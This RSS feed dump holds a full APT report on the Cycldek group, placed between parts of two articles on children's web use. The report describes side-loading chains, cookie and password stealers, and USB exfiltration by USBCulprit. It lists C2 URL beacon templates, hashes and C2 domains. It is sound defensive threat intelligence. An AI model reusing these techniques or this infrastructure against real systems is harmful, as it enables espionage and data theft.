En segundo lugar están los niños de Rusia (1,06%) y Francia (0,95%). En China (0,04%), los niños visitan sitios con contenido para adultos desde computadoras de escritorio con menos frecuencia que los demás niños del mundo.

Conclusión

Hoy,en todo el mundo estamos ante una demostración sin precedentes de que las tecnologías digitales ayudan al desarrollo de los niños, en vez de obstaculizarlo. La educación en línea, la comunicación con amigos y familiares, todo esto es posible solo gracias a las tecnologías que se han desarrollado en las últimas décadas y se han convertido no solo en una ayuda diaria, sino también en un salvavidas los días en que salir del hogar y tener contacto físico puede ser un peligro para la salud.

Los datos de los últimos meses han demostrado que los niños que se quedan en casa y tienen acceso constante a una computadora, se dedican sobre todo a comunicarse y a ver videos. Y no necesariamente solo para entretenerse: es posible que entre los videos de YouTube también haya contenido educativo.

Este año notamos una tendencia interesante: el comportamiento en línea de los niños depende del sistema operativo que usen. Los niños usuarios de MacOS pasan más tiempo en sitios de compras en línea, están un poco más interesados en sitios para adultos, se comunican más en línea y visitan menos sitios de juegos. Los usuarios de Windows están más interesados en juegos y noticias, y también visitan sitios con contenido de video y audio.

También observamos que los niños, así como los adultos, prestan atención a las noticias cuando la situación en el mundo les concierne directamente. Así, en el mes cuando en diferentes países se esperaba la transición a la educación a distancia, los niños comenzaron a aumentar la frecuencia con la que seguían la situación en los sitios de noticias.

Para los niños de hoy, que desde una edad temprana comienzan su interacción con la tecnología, es mucho más fácil que para los adultos transferir todas sus actividades diarias a Internet: están más adaptados a las situaciones en las que salir de casa representa un peligro para la vida. Los adultos tienden a cuestionar algunas actividades en línea, como comunicarse con sus semejantes. Pero en un mundo donde este es el único medio seguro de interacción social, poco a poco se están dando cuenta de que no todo es tan simple.

Contributor:
Copyright:
Category: Destacados
Date: Fri, 05 Jun 2020 10:00:09 +0000
Local date: Fri, 05 Jun 2020 10:00:09 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Cycldek: Bridging the (air) gap
Author: GReAT
Link :
Email :
Description: While investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far.
Full content:

Key findings

While investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:

  • Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.
  • Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.
  • We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.
  • One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.

Background

Cycldek is a long-known Chinese-speaking threat actor. Based on the group’s past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:

  • 2013 – indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly described by CrowdStrike.
  • 2014 – further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.
  • 2017 – the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as described by Fortinet.
  • 2018 – attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky’s Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.

Figure 1: Timeline of Cycldek-attributed attacks.

Most attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as ‘Royal Road’) and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:

  • a legitimate signed application, usually related to an AV product, e.g. QcConsol – McAfee’s QuickClean utility, and wsc_proxy.exe, Avast’s remediation service.
  • a malicious DLL which is side-loaded by the former application.
  • an encrypted binary which gets decrypted and executed by the DLL.

The final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on Github, allowing attackers to leverage and modify it for their needs.

In the case of Cycldek, the first public accounts of the group’s usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.

Two implants, two clusters

When inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.

Our analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster’s implant are summarized in the table below.

BlueCore RedCore
Initial Infection Vector RTF documents Unknown
Legitimate AV Utility QcConcol.exe (McAfee’s QuickClean utility) wsc_proxy.exe (Avast’s remediation application)
Side-Loaded DLL QcLite.dll wsc.dll
Payload Loader stdole.tlb – contains PE loading shellcode and an encrypted BlueCore binary msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary
Injected Process dllhst3g.exe explorer.exe or winlogon.exe
Configuration File %APPDATA%\desktop.ini C:\Documents and Settings\All Users\Documents\desktop.ini or

C:\Documents and Settings\All Users\Documents\desktopWOW64.ini

Mutexes UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},

{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},

{E68DFA68-1132-4A32-ADE2-8C87F282C457},

{728264DE-3701-419B-84A4-2AD86B0C43A3},

{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},

{D9AE3AB0-D123-4F38-A9BE-898C8D49A214}

Communicated URL Scheme http://%s:%d/link?url=%s&enpl=%s&encd=%s http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s

or

http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s

Table 1: Comparison of BlueCore and RedCore loader and implant traits.

As demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.

Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore.

Moreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files ‘stdole.tlb’ and ‘msgsm64.acm’,  contains a routine used to decrypt the implants’ raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.

Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters.

Having said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:

  • Keylogger: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named ‘RCoRes64.dat’. The data is encoded using a single byte XOR with the key 0xFA.
  • Device enumerator: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.
  • RDP logger: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named EventCop which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.
  • Proxy server: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.

Perhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.

Figure 4: Difference in URL scheme used by each implant for C2 communication.

The conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.

Figure 5: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.

Furthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources – both code and infrastructure – and operating under a single organizational umbrella.

Figure 6: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.

Info stealing and lateral movement toolset

During the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools – some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.

As in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.

As already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).

The rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:

  • Custom HDoor: an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the Naikon APT that made use of the original tool.
    The custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.

Figure 7: Command line usage of the custom HDoor tool.

  • JsonCookies: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named ‘FuckCookies.txt’ containing stolen cookie info. Entries in the file resemble this one:
{
"domain": ".google.com",
"id": 1,
"name": "NID",
"path": "/",
"value": "%VALUE%"
}
  • ChromePass: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.

Figure 8: Command line usage of the ChromePass tool.

Formerly Unreported Malware: USBCulprit

One of the most notable examples in Cycldek’s toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

During the time the malware was active, it showed little change in functionality. Based on Kaspersky’s telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.

Another change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.

This loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named ‘wrapper.exe’ (originally named ‘PtUserSessionWrapper.exe’ and belonging to Trend Micro) forces the execution of a malicious DLL named ‘TmDbgLog.dll’. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.

Figure 9: USBCulprit’s loading flow, as observed in samples after 2017.

Once USBCulprit is loaded to memory and executed, it operates in three phases:

  • Boostrap and data collection: this stage prepares the environment for the malware’s execution. Namely, it invokes two functions named ‘CUSB::RegHideFileExt’ and ‘CUSB::RegHideFile’ that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named ‘CUSB::USBFindFile’. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.

The chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a ‘rar.exe’ command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware’s execution, and is set to ‘abcd!@#$’ for most variants that we observed.

It is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named ‘time’ within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the ‘time’ file doesn’t exist, it is created with the default value ‘20160601000000’ corresponding to 01/06/2016 00:00:00.

  • USB connection interception and data exfiltration/delivery: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.

When a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named ‘$Recyc1e.Bin’ will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.

To understand which direction of file copy should take place, a special marker file named ‘1.txt’ is searched locally. If it exists, the malware would expect to find the aforementioned ‘$Recyc1e.Bin’ directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.

Figure 10: USBCulprit’s check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it.

  • Lateral movement and extension: as part of the same loop mentioned above, the existence of another marker file named ‘2.txt’ will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware’s binary be copied from its local path to the ‘$Recyc1e.Bin’ directory. It’s noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named ‘CUSB::runlist’, while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.

The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.

Figure 11: Commands used to profile the network connectivity of the compromised host.

Another explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.

Conclusion

Cycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.

Furthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it’s worth noting that we noted multiple points where such entities didn’t work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.

Lastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased – it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.

For more information about Cycldek operations, contact us at: intelreports@kaspersky.com

Appendix – IOCs

Note: a full list of IOCs can be found in our reports on the subject in Kaspersky’s Threat Intelligence Portal.

RedCore:

A6C751D945CFE84C918E88DF04D85798 – wsc.dll (side-loaded DLL)
4B785345161D288D1652C1B2D5CEADA1 – msgsm64.acm (encrypted shellcode and implant)

BlueCore:

1B19175C41B9A9881B23B4382CC5935F  – QcLite.dll (side-loaded DLL)
6D2E6A61EEDE06FA9D633CE151208831 – QcLite.dll (side-loaded DLL)
6EA33305B5F0F703F569B9EBD6035BFD – QcLite.dll (side-loaded DLL)
600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)

Lateral Movement and Info-Stealing Toolset:

1640EE7A414DFF996AF8265E0947DE36 Chromepass
1EA07468EBDFD3D9EEC59AC57A490701 Chromepass
07EE1B99660C8CD5207E128F44AA8CBC JsonCookies
809196A64CA4A32860D28760267A1A8B Custom HDoor
81660985276CF9B6D979753B6E581D34 Custom HDoor
A44804C2767DCCD4902AAE30C36E62C0 Custom HDoor

 

USBCulprit:

A9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader
C73B000313DCD2289F51B367F744DCD8 USBCulprit Loader
2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader
4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader
6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader
7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader
782FF651F34C87448E4503B5444B6164 USBCulprit Loader
88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader
A4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader
3CA7BD71B30007FC30717290BB437152 USBCulprit Payload
58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload
A02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload
D8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload
2E522CE8104C0693288C997604AE0096 USBCulrprit Payload

 

Toolset overlapping in both clusters:

Common Name MD5 Blue Cluster Domain Red Cluster Domain Description
chromepass.exe 1EA07468EBDFD3D9EEC59AC57A490701 http://login.vietnamfar.com:8080

 

http://news.trungtamwtoa.com:88 ChromePass
goopdate.dll D8DB9D6585D558BA2D28C33C6FC61874 http://cophieu.dcsvnqvmn.com:8080 http://mychau.dongnain.com:443

http://hcm.vietbaonam.com:443

USBCulprit
2E522CE8104C0693288C997604AE0096 http://nghiencuu.onetotechnologys.com:8080

ttp://tinmoi.thoitietdulich.com:443

http://tinmoi.thoitietdulich.com:53

http://tinmoi.vieclamthemde.com:53

http://tinmoi.vieclamthemde.com

USBCulprit
qclite.dll 7FF0AF890B00DEACBF42B025DDEE8402 http://web.hcmuafgh.com http://tinmoi.vieclamthemde.com

http://tintuc.daikynguyen21.com

BlueCore Loading Hijacked DLL
silverlightmsi.dat A44804C2767DCCD4902AAE30C36E62C0 http://web.laovoanew.com:443

http://cdn.laokpl.com:8080

http://login.dangquanwatch.com:53

http://info.coreders.com:8080

Custom HDoor

 

C&Cs and Dropzones:

http://web.laovoanew[.]com – Red Cluster

http://tinmoi.vieclamthemde[.]com – Red Cluster

http://kinhte.chototem[.]com – Red Cluster

http://news.trungtamwtoa[.]com – Red Cluster

http://mychau.dongnain[.]com – Red Cluster

http://hcm.vietbaonam[.]com – Red Cluster

http://login.thanhnienthegioi[.]com – Red Cluster

http://103.253.25.73 – Red Cluster

http://luan.conglyan[.]com – Red Cluster

http://toiyeuvn.dongaruou[.]com – Red Cluster

http://tintuc.daikynguyen21[.]com – Red Cluster

http://web.laomoodwin[.]com – Red Cluster

http://login.giaoxuchuson[.]com – Red Cluster

http://lat.conglyan[.]com – Red Cluster

http://thegioi.kinhtevanhoa[.]com – Red Cluster

http://laovoanew[.]com – Red Cluster

http://cdn.laokpl[.]com – Red Cluster

http://login.dangquanwatch[.]com – Blue Cluster

http://info.coreders[.]com – Blue Cluster

http://thanhnien.vietnannnet[.]com – Blue Cluster

http://login.diendanlichsu[.]com – Blue Cluster

http://login.vietnamfar[.]com – Blue Cluster

http://cophieu.dcsvnqvmn[.]com – Blue Cluster

http://nghiencuu.onetotechnologys[.]com – Blue Cluster

http://tinmoi.thoitietdulich[.]com – Blue Cluster

http://khinhte.chinhsech[.]com – Blue Cluster

http://images.webprogobest[.]com – Blue Cluster

http://web.hcmuafgh[.]com – Blue Cluster

http://news.cooodkord[.]com – Blue Cluster

http://24h.tinthethaoi[.]com – Blue Cluster

http://quocphong.ministop14[.]com – Blue Cluster

http://nhantai.xmeyeugh[.]com – Blue Cluster

http://thoitiet.yrindovn[.]com – Blue Cluster

http://hanghoa.trenduang[.]com – Blue Cluster

Contributor:
Copyright:
Category: APT reports
Date: Wed, 03 Jun 2020 10:00:32 +0000
Local date: Wed, 03 Jun 2020 10:00:32 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 808 px
Kids on the Web in 2020
Author: Anna Larkina
Link :
Email :
Description: The world is witnessing an unprecedented demonstration of digital technology primarily helping children develop, rather than impede their development.
Full content:

Technology is what is saving us from a complete change in the way of life in a world of a raging pandemic. It keeps the educational process going, relieves the shortage of human communication and helps us to live life as fully as possible given the isolation and social distancing. Many adults, and children too, have come to realize that the computer is not just a means of entertainment, but an important tool for education, communication and personal growth.

In this article, we look at changes that occurred in children’s behavior on the Web over the past year and the pandemic period. The report is based on statistics gathered by Kaspersky Safe Kids, a software solution that protects children from unwanted content on the Internet.

How we collect our statistics

Kaspersky Safe Kids scans the contents of a Web page the child is trying to access. If the site falls into one of fourteen undesirable categories, the module sends an alert to Kaspersky Security Network. No user’s personal information is transmitted and neither is privacy compromised.

We will note two important points:

  • It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. But anonymous statistics are collected for all the 14 categories.
  • Data is harvested only from computers running Windows and macOS; no mobile statistics are provided in this report.

Website categorization

Kaspersky Safe Kids filters Web content according to the following categories:

In this article, we will take a closer look at the most-visited categories for the past year. We have combined the less popular ones into a separate category, with their share of alerts marked as “Other”.

Picture of the world

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020 (download)

Children around the world have spent increasingly more time watching videos and listening to music. Software, Audio, Video accounted for nearly forty percent of all Safe Kids alerts over the past year. It was followed by Internet Communications with 24.16 percent and Video Games with 15.98 percent. Online stores were fourth in popularity with 11 percent and News were fifth with 5.54 percent.

Interestingly, Job Search sites with 0.89 percent attracted far more interest from teenagers than Adult Content with 0.74 percent.

Kaspersky Safe Kids Windows and macOS alerts distribution by category in June 2019 through May 2020 (download)

Windows users spent more time watching videos, gaming and reading news than macOS users. The latter preferred chatting and spent much more time shopping online. That said, the adult content Windows users watched on the average more frequently during the year.

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020 (download)

The pandemic forced kids to study at home, attending classes online, and we have seen how this affected their time at the computer. They less frequently visited gaming sites starting at the beginning of the year, even when compared with the September 2019 low of 16.75 percent: the figure fell to 13.26 percent in May. Meanwhile, Internet Communications showed a slight growth in April exceeding the October 2019 high by 0.85 p.p. to reach 27.51 percent.

Children visited online stores the most in the October of 2019. The category accounted for 16.93 percent of all alerts. The popularity of online shopping has steadily decreased since then, dropping by 7.57 p.p. to 9.3 percent by April, but May saw it rebound slightly. Adult Content grew somewhat (by about 0.5 p.p.) in winter, then returned to the summer 2019 levels (0.49 percent) in May.

The graph shows an abnormal drop in visits to Software, Audio, Video websites  in October. The most likely cause can be considered to be the new macOS version, Catalina, released on October 7. Users who installed the update faced issues with streaming video on YouTube, Netflix, Amazon Prime and many other sites. The issue affected not just the Safari browser, but Google Chrome, Opera and Firefox as well. It was fixed in November, a fact that the statistics reflect.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on macOS in June 2019 through May 2020 (download)

Differences across regions, countries and months

Let us take a closer look at the most popular categories by region and by country to see if children’s preferences changed during the pandemic.

Software, audio, video

Software, Audio, Video has remained ahead of Internet Communications in recent years: kids have used Windows and macOS computers for watching videos and listening to music, but switched to mobile devices to chat. The category has retained its popularity even through the lockdown and online studies.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020 (download)

According to KSN statistics for the first half of 2020, Software, Audio, Video began to grow worldwide, reaching a peak of 42.47 percent on all platforms by May.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020 (download)

We explained the decrease in the category’s share on macOS in the fall and winter with issues stemming from an operating system update. As for the decline among Windows users around the same time, it was offset by increasing interest in other categories of sites, for instance, E-Commerce.

By the end of the reporting period, the share of Software, Audio, Video had increased among Windows users, whereas children using macOS began watching videos less frequently by May.

Kids in South Asia (India, Bangladesh) were most likely to spend their time watching videos and listening to music (46.16 percent). It was followed by Africa with 44.75 percent and the CIS with 43.83 percent.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by region in June 2019 through May 2020 (download)

The category had the lowest share in North America (36.20 percent) and Europe (35.94 percent). As we will see below, children in these regions gave preference not only to watching videos, but video games as well.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS by region in June 2019 through May 2020 (download)

In Asia and South Asia, children who used macOS were more likely to consume audio and video content than those who used Windows. In other regions, the category’s Windows share was higher than macOS. In the CIS countries, children’s behavior was nearly identical on the two operating systems.

Interestingly, the distribution of countries where the share of Software, Audio, Video was the largest differs slightly from the regional breakdown.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by country in June 2019 through May 2020 (download)

Children in Belarus (50.59 percent), Japan (49.67 percent), Saudi Arabia (49.54 percent) and India (47.66 percent) favored websites that offered video and music over the past year. YouTube was the most popular video streaming service with kids anywhere in the world.

Online communication

Internet Communications predictably peaked at 27.45 percent in April 2020 as the process of switching schoolchildren to distance learning completed in most countries.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020 (download)

We observe a pronounced growth from 17.87 percent in June 2019 to 36.63 percent in May 2020 on desktop computers and laptops running macOS. October’s peak was due to a reduction in the share of Software, Audio, Video category following the macOS update.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020 (download)

Internet Communications accounted for an average of 32.76 percent, with 32.17 percent in Latin America and 30.54 percent in the CIS, and the lowest recorded shares being 15.50 percent in Europe and 16.58 percent in Oceania.

Kaspersky Safe Kids alerts distribution for Internet Communications by region in June 2019 through May 2020 (download)

Kaspersky Safe Kids alerts distribution for Internet Communications by country on the average in June 2019 through May 2020 (download)

The largest proportions of children using personal computers for internet communication were recorded in Egypt, Kenya, Mexico and Russia. The lowest rates were recorded in Germany, Australia, the UK and Canada.

Starting at the beginning of 2020, the most popular sites in the Internet Communications category were skype.com, hangouts.google.com, web.whatsapp.com, meet.google.com, facebook.com, twitter.com and mail.google.com.

Computer games

Despite the fact that the share of Video Games alerts showed a downward trend in the first half of 2020, the category ranked third among the most popular website topics.

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020 (download)

Kids spent more times playing video games on Windows than macOS desktop computers and laptops. This is due to the fact that most computer games are released for the Windows operating system. However, by the end of the reporting period, macOS users’ interest in games had grown.

